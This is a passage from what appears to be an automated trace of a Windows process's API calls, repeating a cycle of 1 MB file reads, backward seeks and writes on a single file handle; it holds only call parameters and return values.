liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.182] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.184] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.196] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.196] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.198] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.225] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.225] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.228] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.240] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.240] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.242] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.273] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.273] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.276] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.287] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.287] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.289] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.315] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.315] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.318] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.329] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.329] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.331] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.359] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.359] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.361] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.373] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.373] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.375] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.402] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.402] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.404] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.415] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.415] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.417] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.443] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.444] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.446] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.467] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.467] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.470] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.496] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.496] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.499] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.510] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.510] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.512] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.541] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.542] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.544] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.555] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.555] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.558] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.591] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.591] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.594] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.605] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.606] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.608] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.638] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.638] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.640] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.652] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.652] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.654] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.696] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.696] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.698] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.709] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.710] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.712] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.781] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.781] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.783] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.795] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.795] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.797] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.824] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.824] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.827] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.851] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.851] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.854] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.881] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.881] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.883] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.923] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.923] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.926] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.952] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.952] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.954] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.965] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.965] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.967] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.997] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.997] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.999] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.010] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.010] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.012] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.039] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.039] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.041] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.058] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.058] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.060] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.087] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.087] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.090] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, 